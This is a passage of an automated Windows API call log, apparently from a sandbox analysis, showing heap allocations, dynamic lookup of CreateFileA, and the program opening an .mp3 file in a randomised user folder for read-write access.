Flags=0x0, Size=0x10) returned 0x88cce8 [0037.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0037.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0037.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0037.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0037.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0037.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0037.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0037.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0037.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0037.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0037.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0037.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0037.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0037.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0037.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0037.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0037.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0037.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0037.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0037.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0037.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0037.570] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0037.570] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0037.570] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0037.570] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0037.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0037.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0037.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0037.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0037.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0037.570] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0037.570] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0037.570] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0037.570] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0037.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0037.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0037.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0037.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0037.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0037.570] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0037.570] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0037.570] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0037.570] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0037.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0037.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0037.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0037.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0037.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0037.570] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0037.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0037.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0037.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0037.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0037.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0037.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0037.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0037.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0037.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0037.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0037.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0037.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0037.571] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0037.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0037.572] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0037.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x88cce8 [0037.572] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x88cce8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0037.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0037.572] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0037.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0037.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0037.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0037.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0037.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0037.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0037.572] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0037.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cce8 [0037.572] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x88cce8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0037.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0037.572] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0037.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0037.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0037.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0037.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0037.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0037.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0037.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0037.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0037.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0037.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0037.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0037.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0037.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0xaa0008 [0037.573] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\65ojNSJoZHlTi0VKh7.mp3", cchWideChar=70, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 70 [0037.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x46) returned 0x88e138 [0037.573] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\65ojNSJoZHlTi0VKh7.mp3", cchWideChar=70, lpMultiByteStr=0x88e138, cbMultiByte=70, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\65ojNSJoZHlTi0VKh7.mp3", lpUsedDefaultChar=0x0) returned 70 [0037.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e138 | out: hHeap=0x770000) returned 1 [0037.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0037.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0037.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0037.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0037.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0037.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0037.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0037.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0037.573] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\65ojNSJoZHlTi0VKh7.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\7d68killni\\65ojnsjozhlti0vkh7.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0037.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0037.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0037.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0037.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0037.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0037.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0037.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0037.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0037.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0037.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0037.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0037.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0037.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0037.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0037.574] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xaa0008, cbMultiByte=70, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 70 [0037.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8c) returned 0x7c3818 [0037.574] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xaa0008, cbMultiByte=70, lpWideCharStr=0x7c3818, cchWideChar=70 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\65ojNSJoZHlTi0VKh7.mp3") returned 70 [0037.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0037.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x90) returned 0x7c38b0 [0037.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c3818 | out: hHeap=0x770000) returned 1 [0037.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0037.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0037.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0037.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0037.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0037.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0037.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0037.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0037.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0037.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0037.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0037.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0037.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0037.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0037.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0037.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0037.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0037.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0037.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0037.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0037.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0037.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0037.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0037.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0037.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0037.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0037.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0037.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0037.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0037.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0037.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0037.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0037.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0037.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0037.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0037.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0037.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0037.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0037.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0037.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0037.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0037.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0037.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0037.575] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0037.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0037.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0037.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0037.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0037.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0037.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0037.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0037.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0037.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0037.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0037.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0037.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0037.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0037.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0037.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0037.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0037.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0037.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0037.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0037.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0037.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0037.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0037.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0037.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0037.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0037.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0037.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0037.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0037.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0037.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0037.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0037.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0037.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0037.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0037.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0037.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0037.577] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0037.577] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0037.577] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0037.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0037.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0037.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0037.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0037.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0037.577] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0037.577] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0037.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0037.577] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0037.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0037.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0037.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0037.577] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0037.577] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0037.577] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0037.577] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0037.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0037.577] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0037.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0037.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0037.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0037.577] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: 